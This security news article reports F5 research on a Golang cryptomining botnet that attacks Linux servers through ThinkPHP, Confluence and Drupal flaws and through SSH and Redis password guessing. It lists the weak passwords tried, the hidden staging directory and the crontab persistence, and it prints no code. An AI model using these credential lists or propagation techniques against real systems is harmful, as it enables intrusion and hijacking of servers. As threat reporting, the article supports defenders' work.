Pierluigi Paganini July 05, 2019

Experts at F5 Networks discovered a cryptomining campaign that is delivering a new piece of the Golang malware that targets Linux-based servers.

F5 experts uncovered a cryptominer campaign that is delivering a new strain of Golang malware that targets Linux-based servers.

The campaign began around June 10 and already infected several thousand machines. The malicious code is hosted on an already compromised Chinese online store, threat actors use the service Pastebin to host the spearhead bash script.

“F5 researchers uncovered a cryptominer campaign delivering new Golang malware that targets Linux-based servers.” reads the analysis published by F5.

“The malware campaign propagates using 7 different methods: 4 web application exploits (2 targeting ThinkPHP, 1 targeting Drupal, and 1 targeting Confluence), SSH credentials enumeration, Redis database passwords enumeration, and also trying to connect other machines using found SSH keys.”

Attackers leverage well-known flaws to compromise target systems, including security issues in ThinkPHP (CVE-2019-9082 and CVE-unassigned), Atlassian Confluence (CVE-2019-3396), and the popular Drupalgeddon vulnerability (CVE-2018-7600).

Attackers also use SSH credentials enumeration, Redis database passwords enumeration, and try to connect other machines using found SSH keys.

The malware is written in the Go programming language developed by Google, earlier this year Cybaze-Yoroi ZLab experts analyzed another GoLang botnet named GoBrut.

In the attacks aimed at Redis databases, the malicious code first attempts to connect to the default port without credentials, then tries to access using seven common passwords (admin, redis, root, 123456, password, user, and test).

When attempting to access SSH ports, the malware attempts to enumerate four usernames (root, admins, user, and test) and tries each with seven passwords (admins, root, test (appears twice), user, 123456, and password).

“The final propagation method is not done by the Go binary itself but another shell script which will be discussed in the next section. The script looks for existing known hosts in the SSH directory and then tries to connect to those machines over SSH and infect them, as well. ” continues the report.

When the malware compromises a system it downloads a bash script from pastebin.com and fetches several archives, one of them contains the Go malware. Downloaded files are saved to a hidden /tmp/.mysqli directory to prevent removal and mislead users.

One of the scripts extracted from the binary attempts to disable several security controls on the infected system, including SELinux.

The threat achieves persistence through a new crontab set up to download the bash script every 15 minutes. The script sets the Go malware as a service and search for competitors’ process running from the /tmp directory and kills them.

The archives downloaded by the malware includes the main Go malware along with a Monero miner.

“The malware is mining XMR using the cryptonight algorithm and submits hashes to several public pools. At the time of this writing, this operation had earned the attacker less than $2,000 USD. However, this information is based only on the wallets our specific miners were using. It could be that the attacker has several wallets used by different parts of his botnet. ” wrote the experts.

The malicious file was downloaded over 12,000 times from Pastebin, a data that could give us an idea of the dimension of the botnet.

“It is clear that Go, although still used mostly by legitimate developers is also “Go-ing” to the dark side. Golang malware is starting to emerge on the threat landscape. Although this sample is not the most sophisticated piece of malware analyzed by F5 researchers, it has several unique qualities which make it notable.” conclude the experts.

Pierluigi Paganini

(SecurityAffairs – Golang malware, cryptominer)

[adrotate banner=”5″]

[adrotate banner=”13″]